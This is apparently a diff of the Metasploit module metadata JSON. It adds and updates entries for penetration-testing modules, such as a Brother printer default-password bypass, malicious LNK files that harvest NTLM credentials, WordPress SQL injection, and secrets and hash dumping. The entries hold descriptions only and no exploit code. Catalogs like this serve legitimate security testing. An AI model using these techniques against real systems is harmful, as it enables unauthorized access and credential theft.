+    "autofilter_services": [],
+    "targets": null,
+    "mod_time": "2025-05-13 09:23:28 +0000",
+    "path": "/modules/auxiliary/admin/ldap/ldap_object_attribute.rb",
+    "is_install_path": true,
+    "ref_name": "admin/ldap/ldap_object_attribute",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "ldap"
+    ],
+    "needs_cleanup": false,
+    "actions": [
+      {
+        "name": "CREATE",
+        "description": "Create an LDAP object"
+      },
+      {
+        "name": "DELETE",
+        "description": "Delete the LDAP object"
+      },
+      {
+        "name": "READ",
+        "description": "Read the the LDAP object"
+      },
+      {
+        "name": "UPDATE",
+        "description": "Modify the LDAP object"
+      }
+    ]
+  },
  "auxiliary_admin/ldap/rbcd": {
    "name": "Role Base Constrained Delegation",
    "fullname": "auxiliary/admin/ldap/rbcd",
@@ -6994,11 +7115,11 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-02-13 16:46:31 +0000",
+    "mod_time": "2025-06-23 18:39:19 +0000",
    "path": "/modules/auxiliary/admin/ldap/rbcd.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/rbcd",
-    "check": false,
+    "check": true,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -7053,11 +7174,11 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-28 09:32:56 +0000",
+    "mod_time": "2025-05-13 09:23:28 +0000",
    "path": "/modules/auxiliary/admin/ldap/shadow_credentials.rb",
    "is_install_path": true,
    "ref_name": "admin/ldap/shadow_credentials",
-    "check": false,
+    "check": true,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -7186,6 +7307,63 @@
    "needs_cleanup": false,
    "actions": []
  },
+  "auxiliary_admin/misc/brother_default_admin_auth_bypass_cve_2024_51978": {
+    "name": "Multiple Brother devices authentication bypass via default administrator password generation",
+    "fullname": "auxiliary/admin/misc/brother_default_admin_auth_bypass_cve_2024_51978",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2025-06-25",
+    "type": "auxiliary",
+    "author": [
+      "sfewer-r7"
+    ],
+    "description": "By leaking a target devices serial number, a remote attacker can generate the target devices default\n          administrator password. The target device may leak its serial number via unauthenticated HTTP, HTTPS, IPP,\n          SNMP, or PJL requests.",
+    "references": [
+      "CVE-2024-51977",
+      "CVE-2024-51978",
+      "URL-https://support.brother.com/g/b/link.aspx?prod=group2&faqid=faq00100846_000",
+      "URL-https://support.brother.com/g/b/link.aspx?prod=group2&faqid=faq00100848_000",
+      "URL-https://support.brother.com/g/b/link.aspx?prod=lmgroup1&faqid=faqp00100620_000",
+      "URL-https://www.rapid7.com/blog/post/multiple-brother-devices-multiple-vulnerabilities-fixed",
+      "URL-https://github.com/sfewer-r7/BrotherVulnerabilities"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2025-07-09 14:59:54 +0000",
+    "path": "/modules/auxiliary/admin/misc/brother_default_admin_auth_bypass_cve_2024_51978.rb",
+    "is_install_path": true,
+    "ref_name": "admin/misc/brother_default_admin_auth_bypass_cve_2024_51978",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [],
+      "Reliability": []
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
  "auxiliary_admin/misc/sercomm_dump_config": {
    "name": "SerComm Device Configuration Dump",
    "fullname": "auxiliary/admin/misc/sercomm_dump_config",
@@ -11056,7 +11234,8 @@
    "description": "This module authenticates to an Active Directory Domain Controller and creates\n          a volume shadow copy of the %SYSTEMDRIVE%. It then pulls down copies of the\n          ntds.dit file as well as the SYSTEM hive and stores them. The ntds.dit and SYSTEM\n          hive copy can be used in combination with other tools for offline extraction of AD\n          password hashes. All of this is done without uploading a single binary to the\n          target host.",
    "references": [
      "URL-http://sourceforge.net/projects/smbexec",
-      "URL-https://www.optiv.com/blog/owning-computers-without-shell-access"
+      "URL-https://www.optiv.com/blog/owning-computers-without-shell-access",
+      "ATT&CK-T1003.003"
    ],
    "platform": "",
    "arch": "",
@@ -11070,7 +11249,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2025-05-21 08:32:40 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/psexec_ntdsgrab",
@@ -12268,7 +12447,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-07 21:38:27 +0000",
+    "mod_time": "2025-08-02 14:18:28 +0000",
    "path": "/modules/auxiliary/analyze/crack_aix.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_aix",
@@ -12285,6 +12464,10 @@
    "session_types": false,
    "needs_cleanup": false,
    "actions": [
+      {
+        "name": "auto",
+        "description": "Auto-selection of cracker"
+      },
      {
        "name": "hashcat",
        "description": "Use Hashcat"
@@ -12320,7 +12503,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-07 21:38:27 +0000",
+    "mod_time": "2025-07-30 14:09:45 +0000",
    "path": "/modules/auxiliary/analyze/crack_databases.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_databases",
@@ -12337,6 +12520,10 @@
    "session_types": false,
    "needs_cleanup": false,
    "actions": [
+      {
+        "name": "auto",
+        "description": "Auto-selection of cracker"
+      },
      {
        "name": "hashcat",
        "description": "Use Hashcat"
@@ -12369,7 +12556,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-07 21:38:27 +0000",
+    "mod_time": "2025-07-30 14:10:03 +0000",
    "path": "/modules/auxiliary/analyze/crack_linux.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_linux",
@@ -12386,6 +12573,10 @@
    "session_types": false,
    "needs_cleanup": false,
    "actions": [
+      {
+        "name": "auto",
+        "description": "Auto-selection of cracker"
+      },
      {
        "name": "hashcat",
        "description": "Use Hashcat"
@@ -12455,7 +12646,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-07 21:38:27 +0000",
+    "mod_time": "2025-07-30 14:10:31 +0000",
    "path": "/modules/auxiliary/analyze/crack_osx.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_osx",
@@ -12472,6 +12663,10 @@
    "session_types": false,
    "needs_cleanup": false,
    "actions": [
+      {
+        "name": "auto",
+        "description": "Auto-selection of cracker"
+      },
      {
        "name": "hashcat",
        "description": "Use Hashcat"
@@ -12500,7 +12695,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-07 21:38:27 +0000",
+    "mod_time": "2025-07-30 14:10:49 +0000",
    "path": "/modules/auxiliary/analyze/crack_webapps.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_webapps",
@@ -12517,6 +12712,10 @@
    "session_types": false,
    "needs_cleanup": false,
    "actions": [
+      {
+        "name": "auto",
+        "description": "Auto-selection of cracker"
+      },
      {
        "name": "hashcat",
        "description": "Use Hashcat"
@@ -12549,7 +12748,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-05-07 21:38:27 +0000",
+    "mod_time": "2025-07-30 14:11:06 +0000",
    "path": "/modules/auxiliary/analyze/crack_windows.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_windows",
@@ -12566,6 +12765,10 @@
    "session_types": false,
    "needs_cleanup": false,
    "actions": [
+      {
+        "name": "auto",
+        "description": "Auto-selection of cracker"
+      },
      {
        "name": "hashcat",
        "description": "Use Hashcat"
@@ -13912,7 +14115,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-20 13:20:44 +0000",
+    "mod_time": "2025-08-01 10:48:54 +0000",
    "path": "/modules/auxiliary/dos/http/apache_range_dos.rb",
    "is_install_path": true,
    "ref_name": "dos/http/apache_range_dos",
@@ -18475,6 +18678,130 @@
    "needs_cleanup": false,
    "actions": []
  },
+  "auxiliary_fileformat/datablock_padding_lnk": {
+    "name": "Windows Shortcut (LNK) Padding",
+    "fullname": "auxiliary/fileformat/datablock_padding_lnk",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2025-07-19",
+    "type": "auxiliary",
+    "author": [
+      "Nafiez"
+    ],
+    "description": "This module generates Windows LNK (shortcut) file that can execute\n          arbitrary commands. The LNK file uses environment variables and execute\n          its arguments from COMMAND_LINE_ARGUMENTS with extra juicy whitespace\n          character padding bytes and concatenates the actual payload.",
+    "references": [
+      "ZDI-25-148",
+      "URL-https://zeifan.my/Windows-LNK/",
+      "URL-https://gist.github.com/nafiez/1236cc4c808a489e60e2927e0407c8d1",
+      "URL-https://www.trendmicro.com/en_us/research/25/c/windows-shortcut-zero-day-exploit.html"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": null,
+    "mod_time": "2025-09-29 10:12:50 +0000",
+    "path": "/modules/auxiliary/fileformat/datablock_padding_lnk.rb",
+    "is_install_path": true,
+    "ref_name": "fileformat/datablock_padding_lnk",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
+  "auxiliary_fileformat/environment_variable_datablock_leak": {
+    "name": "Right-Click Execution - Windows LNK File Special UNC Path NTLM Leak",
+    "fullname": "auxiliary/fileformat/environment_variable_datablock_leak",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2025-05-06",
+    "type": "auxiliary",
+    "author": [
+      "Nafiez"
+    ],
+    "description": "This module creates a malicious Windows shortcut (LNK) file that\n          specifies a special UNC path in EnvironmentVariableDataBlock of Shell Link (.LNK)\n          that can trigger an authentication attempt to a remote server. This can be used\n          to harvest NTLM authentication credentials.\n\n          When a victim right-click the generated LNK file, it will attempt to connect to the\n          the specified UNC path, resulting in an SMB connection that can be captured\n          to harvest credentials.",
+    "references": [
+      "URL-https://zeifan.my/Right-Click-LNK/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": null,
+    "mod_time": "2025-09-29 11:37:42 +0000",
+    "path": "/modules/auxiliary/fileformat/environment_variable_datablock_leak.rb",
+    "is_install_path": true,
+    "ref_name": "fileformat/environment_variable_datablock_leak",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "screen-effects"
+      ],
+      "Reliability": []
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
+  "auxiliary_fileformat/icon_environment_datablock_leak": {
+    "name": "IconEnvironmentDataBlock - Windows LNK File Special UNC Path NTLM Leak",
+    "fullname": "auxiliary/fileformat/icon_environment_datablock_leak",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2025-05-16",
+    "type": "auxiliary",
+    "author": [
+      "Nafiez"
+    ],
+    "description": "This module creates a malicious Windows shortcut (LNK) file that\n          specifies a special UNC path in IconEnvironmentDataBlock of Shell Link (.LNK)\n          that can trigger an authentication attempt to a remote server. This can be used\n          to harvest NTLM authentication credentials.\n\n          When a victim browse to the location of the LNK file, it will attempt to\n          connect to the the specified UNC path, resulting in an SMB connection that\n          can be captured to harvest credentials.",
+    "references": [
+      "URL-https://zeifan.my/Right-Click-LNK/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": null,
+    "mod_time": "2025-09-29 11:37:42 +0000",
+    "path": "/modules/auxiliary/fileformat/icon_environment_datablock_leak.rb",
+    "is_install_path": true,
+    "ref_name": "fileformat/icon_environment_datablock_leak",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ],
+      "Reliability": []
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
  "auxiliary_fileformat/maldoc_in_pdf_polyglot": {
    "name": "Maldoc in PDF Polyglot converter",
    "fullname": "auxiliary/fileformat/maldoc_in_pdf_polyglot",
@@ -18596,6 +18923,44 @@
    "needs_cleanup": false,
    "actions": []
  },
+  "auxiliary_fileformat/specialfolder_leak": {
+    "name": "SpecialFolderDatablock - Windows LNK File Special UNC Path NTLM Leak",
+    "fullname": "auxiliary/fileformat/specialfolder_leak",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2025-05-10",
+    "type": "auxiliary",
+    "author": [
+      "Nafiez"
+    ],
+    "description": "This module creates a malicious Windows shortcut (LNK) file that\n          specifies a special UNC path in SpecialFolderDatablock of Shell Link (.LNK)\n          that can trigger an authentication attempt to a remote server. This can be used\n          to harvest NTLM authentication credentials.\n\n          When a victim browse to the location of the LNK file, it will attempt to\n          connect to the the specified UNC path, resulting in an SMB connection that\n          can be captured to harvest credentials.",
+    "references": [],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": null,
+    "mod_time": "2025-09-29 11:33:33 +0000",
+    "path": "/modules/auxiliary/fileformat/specialfolder_leak.rb",
+    "is_install_path": true,
+    "ref_name": "fileformat/specialfolder_leak",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
  "auxiliary_fileformat/word_unc_injector": {
    "name": "Microsoft Word UNC Path Injector",
    "fullname": "auxiliary/fileformat/word_unc_injector",
@@ -20732,7 +21097,8 @@
    "references": [
      "URL-https://support.checkpoint.com/results/sk/sk182336",
      "URL-https://www.rapid7.com/blog/post/2024/05/30/etr-cve-2024-24919-check-point-security-gateway-information-disclosure/",
-      "URL-https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/"
+      "URL-https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/",
+      "ATT&CK-T1003.008"
    ],
    "platform": "",
    "arch": "",
@@ -20753,7 +21119,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2024-06-13 08:14:35 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb",
    "is_install_path": true,
    "ref_name": "gather/checkpoint_gateway_fileread_cve_2024_24919",
@@ -22403,7 +22769,8 @@
      "EDB-47288",
      "URL-https://www.fortiguard.com/psirt/FG-IR-18-384",
      "URL-https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf",
-      "URL-https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/"
+      "URL-https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/",
+      "ATT&CK-T1003.008"
    ],
    "platform": "",
    "arch": "",
@@ -22424,7 +22791,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-04-16 06:52:59 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/auxiliary/gather/fortios_vpnssl_traversal_creds_leak.rb",
    "is_install_path": true,
    "ref_name": "gather/fortios_vpnssl_traversal_creds_leak",
@@ -24059,11 +24426,13 @@
      "Spencer McIntyre",
      "jheysel-r7"
    ],
-    "description": "This module allows users to query a LDAP server for vulnerable certificate\n          templates and will print these certificates out in a table along with which\n          attack they are vulnerable to and the SIDs that can be used to enroll in that\n          certificate template.\n\n          Additionally the module will also print out a list of known certificate servers\n          along with info about which vulnerable certificate templates the certificate server\n          allows enrollment in and which SIDs are authorized to use that certificate server to\n          perform this enrollment operation.\n\n          Currently the module is capable of checking for certificates that are vulnerable to ESC1, ESC2, ESC3, ESC4,\n          ESC13, and ESC15. The module is limited to checking for these techniques due to them being identifiable\n          remotely from a normal user account by analyzing the objects in LDAP.",
+    "description": "This module allows users to query a LDAP server for vulnerable certificate\n          templates and will print these certificates out in a table along with which\n          attack they are vulnerable to and the SIDs that can be used to enroll in that\n          certificate template.\n\n          Additionally the module will also print out a list of known certificate servers\n          along with info about which vulnerable certificate templates the certificate server\n          allows enrollment in and which SIDs are authorized to use that certificate server to\n          perform this enrollment operation.\n\n          Currently the module is capable of checking for certificates that are vulnerable to ESC1, ESC2, ESC3, ESC4,\n          ESC13, and ESC15. The module is limited to checking for these techniques due to them being identifiable\n          remotely from a normal user account by analyzing the objects in LDAP.\n\n          The module can also check for ESC9, ESC10 and ESC16 but this requires an Administrative WinRM session to be\n          established to definitively check for these techniques.",
    "references": [
      "URL-https://posts.specterops.io/certified-pre-owned-d95910965cd2",
+      "URL-https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7",
      "URL-https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53",
-      "URL-https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc"
+      "URL-https://trustedsec.com/blog/ekuwu-not-just-another-ad-cs-esc",
+      "URL-https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation"
    ],
    "platform": "",
    "arch": "",
@@ -24071,7 +24440,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-03-26 14:53:04 +0000",
+    "mod_time": "2025-08-15 15:34:13 +0000",
    "path": "/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_esc_vulnerable_cert_finder",
@@ -24112,10 +24481,11 @@
      "Tyler Booth",
      "Hynek Petrak"
    ],
-    "description": "This module will gather passwords and password hashes from a target LDAP server via multiple techniques\n          including Windows LAPS.",
+    "description": "This module will gather passwords and password hashes from a target LDAP server via multiple techniques\n          including Windows LAPS. For best results, run with SSL because some attributes are only readable over\n          encrypted connections.",
    "references": [
      "URL-https://blog.xpnsec.com/lapsv2-internals/",
-      "URL-https://github.com/fortra/impacket/blob/master/examples/GetLAPSPassword.py"
+      "URL-https://github.com/fortra/impacket/blob/master/examples/GetLAPSPassword.py",
+      "ATT&CK-T1003"
    ],
    "platform": "",
    "arch": "",
@@ -24123,7 +24493,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-04-07 15:21:08 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/auxiliary/gather/ldap_passwords.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_passwords",
@@ -26017,7 +26387,8 @@
    "description": "This module exploits combined heap and stack buffer overflows for QNAP\n          NAS and NVR devices to dump the admin (root) shadow hash from memory via\n          an overwrite of __libc_argv[0] in the HTTP-header-bound glibc backtrace.\n\n          A binary search is performed to find the correct offset for the BOFs.\n          Since the server forks, blind remote exploitation is possible, provided\n          the heap does not have ASLR.",
    "references": [
      "URL-https://seclists.org/fulldisclosure/2017/Feb/2",
-      "URL-https://en.wikipedia.org/wiki/Binary_search_algorithm"
+      "URL-https://en.wikipedia.org/wiki/Binary_search_algorithm",
+      "ATT&CK-T1003"
    ],
    "platform": "",
    "arch": "",
@@ -26038,7 +26409,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/auxiliary/gather/qnap_backtrace_admin_hash.rb",
    "is_install_path": true,
    "ref_name": "gather/qnap_backtrace_admin_hash",
@@ -26092,7 +26463,8 @@
      "EDB-48531",
      "URL-https://infosecwriteups.com/qnap-pre-auth-root-rce-affecting-450k-devices-on-the-internet-d55488d28a05",
      "URL-https://www.qnap.com/en-us/security-advisory/nas-201911-25",
-      "URL-https://github.com/Imanfeng/QNAP-NAS-RCE"
+      "URL-https://github.com/Imanfeng/QNAP-NAS-RCE",
+      "ATT&CK-T1003.008"
    ],
    "platform": "",
    "arch": "",
@@ -26113,7 +26485,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-02-23 16:27:12 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/auxiliary/gather/qnap_lfi.rb",
    "is_install_path": true,
    "ref_name": "gather/qnap_lfi",
@@ -27610,7 +27982,8 @@
    "description": "This module uses an anonymous-bind LDAP connection to dump data from\n          the vmdir service in VMware vCenter Server version 6.7 prior to the\n          6.7U3f update, only if upgraded from a previous release line, such as\n          6.0 or 6.5.\n          If the bind username and password are provided (BIND_DN and LDAPPassword\n          options), these credentials will be used instead of attempting an\n          anonymous bind.",
    "references": [
      "CVE-2020-3952",
-      "URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html"
+      "URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html",
+      "ATT&CK-T1003"
    ],
    "platform": "",
    "arch": "",
@@ -27618,7 +27991,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-06-05 16:33:42 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb",
    "is_install_path": true,
    "ref_name": "gather/vmware_vcenter_vmdir_ldap",
@@ -27709,7 +28082,11 @@
    ],
    "description": "Dumps SAM hashes and LSA secrets (including cached creds) from the\n          remote Windows target without executing any agent locally. This is\n          done by remotely updating the registry key security descriptor,\n          taking advantage of the WriteDACL privileges held by local\n          administrators to set temporary read permissions.\n\n          This can be disabled by setting the `INLINE` option to false and the\n          module will fallback to the original implementation, which consists\n          in saving the registry hives locally on the target\n          (%SYSTEMROOT%\\Temp\\<random>.tmp), downloading the temporary hive\n          files and reading the data from it. This temporary files are removed\n          when it's done.\n\n          On domain controllers, secrets from Active Directory is extracted\n          using [MS-DRDS] DRSGetNCChanges(), replicating the attributes we need\n          to get SIDs, NTLM hashes, groups, password history, Kerberos keys and\n          other interesting data. Note that the actual `NTDS.dit` file is not\n          downloaded. Instead, the Directory Replication Service directly asks\n          Active Directory through RPC requests.\n\n          This modules takes care of starting or enabling the Remote Registry\n          service if needed. It will restore the service to its original state\n          when it's done.\n\n          This is a port of the great Impacket `secretsdump.py` code written by\n          Alberto Solino.",
    "references": [
-      "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py"
+      "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py",
+      "ATT&CK-T1003.002",
+      "ATT&CK-T1003.004",
+      "ATT&CK-T1003.005",
+      "ATT&CK-T1003.006"
    ],
    "platform": "",
    "arch": "",
@@ -27723,7 +28100,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2025-05-21 11:40:06 +0000",
+    "mod_time": "2025-09-16 18:31:30 +0000",
    "path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_secrets_dump",
@@ -27917,7 +28294,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-05-28 18:01:32 +0000",
+    "mod_time": "2025-07-19 03:22:12 +0000",
    "path": "/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb",
    "is_install_path": true,
    "ref_name": "gather/wp_depicter_sqli_cve_2025_2011",
@@ -27935,12 +28312,64 @@
    },
    "session_types": false,
    "needs_cleanup": false,
-    "actions": [
-      {
-        "name": "SQLi",
-        "description": "Perform SQL Injection via admin-ajax.php?s="
-      }
-    ]
+    "actions": []
+  },
+  "auxiliary_gather/wp_photo_gallery_sqli": {
+    "name": "WordPress Photo Gallery Plugin SQL Injection (CVE-2022-0169)",
+    "fullname": "auxiliary/gather/wp_photo_gallery_sqli",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": "2022-03-14",
+    "type": "auxiliary",
+    "author": [
+      "Krzysztof Zając",
+      "Valentin Lobstein",
+      "X3RX3S"
+    ],
+    "description": "The Photo Gallery by 10Web WordPress plugin <= 1.6.0 is vulnerable to\n          unauthenticated SQL injection via the 'bwg_tag_id_bwg_thumbnails_0[]'\n          parameter in admin-ajax.php (action=bwg_frontend_data).",
+    "references": [
+      "CVE-2022-0169",
+      "WPVDB-0b4d870f-eab8-4544-91f8-9c5f0538709c",
+      "URL-https://github.com/X3RX3SSec/CVE-2022-0169"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2025-07-16 22:04:13 +0000",
+    "path": "/modules/auxiliary/gather/wp_photo_gallery_sqli.rb",
+    "is_install_path": true,
+    "ref_name": "gather/wp_photo_gallery_sqli",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": []
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
  },
  "auxiliary_gather/wp_ultimate_csv_importer_user_extract": {
    "name": "WordPress Ultimate CSV Importer User Table Extract",
@@ -34615,7 +35044,8 @@
    "description": "This module exploits an OS Command Injection vulnerability in Cambium\n          ePMP 1000 (<v2.5) device management portal. It requires any one of the\n          following login credentials - admin/admin, installer/installer, home/home - to\n          dump system hashes.",
    "references": [
      "URL-http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/",
-      "URL-https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83"
+      "URL-https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83",
+      "ATT&CK-T1003"
    ],
    "platform": "",
    "arch": "",
@@ -34636,7 +35066,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-09-08 17:30:59 +0000",
    "path": "/modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_dump_hashes",
@@ -36141,6 +36571,60 @@
    "needs_cleanup": false,
    "actions": []
  },
+  "auxiliary_scanner/http/graphql_introspection_scanner": {
+    "name": "GraphQL Introspection Scanner",
+    "fullname": "auxiliary/scanner/http/graphql_introspection_scanner",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "sjanusz-r7"
+    ],
+    "description": "This module queries a GraphQL API Endpoint to retrieve schema data by using\n          introspection, if it is enabled on the server. This module works on all GraphQL versions.",
+    "references": [
+      "URL-https://portswigger.net/web-security/graphql",
+      "URL-https://graphql.org/learn/introspection/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2025-05-27 17:13:37 +0000",
+    "path": "/modules/auxiliary/scanner/http/graphql_introspection_scanner.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/graphql_introspection_scanner",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "Reliability": []
+    },
+    "session_types": false,
+    "needs_cleanup": false,
+    "actions": []
+  },
  "auxiliary_scanner/http/groupwise_agents_http_traversal": {
    "name": "Novell Groupwise Agents HTTP Directory Traversal",
    "fullname": "auxiliary/scanner/http/groupwise_agents_http_traversal",
@@ -40560,6 +41044,61 @@
    "needs_cleanup": false,
    "actions": []
  },
+  "auxiliary_scanner/http/pretalx_file_read_cve_2023_28459": {
+    "name": "Pretalx Arbitrary File Read/Limited File Write",
+    "fullname": "auxiliary/scanner/http/pretalx_file_read_cve_2023_28459",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Stefan Schiller",
+      "msutovsky-r7"
+    ],
+    "description": "This module exploits functionality in Pretalx that export conference schedule as zipped file. The Pretalx will iteratively include any file referenced by any HTML tag and does not properly check the path of the file, which can lead to arbitrary file read. The module requires credentials that allow schedule export, schedule release and approval of proposals. Additionally, module requires conference name and URL for media files.",
+    "references": [],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2025-08-22 15:26:46 +0000",
+    "path": "/modules/auxiliary/scanner/http/pretalx_file_read_cve_2023_28459.rb",
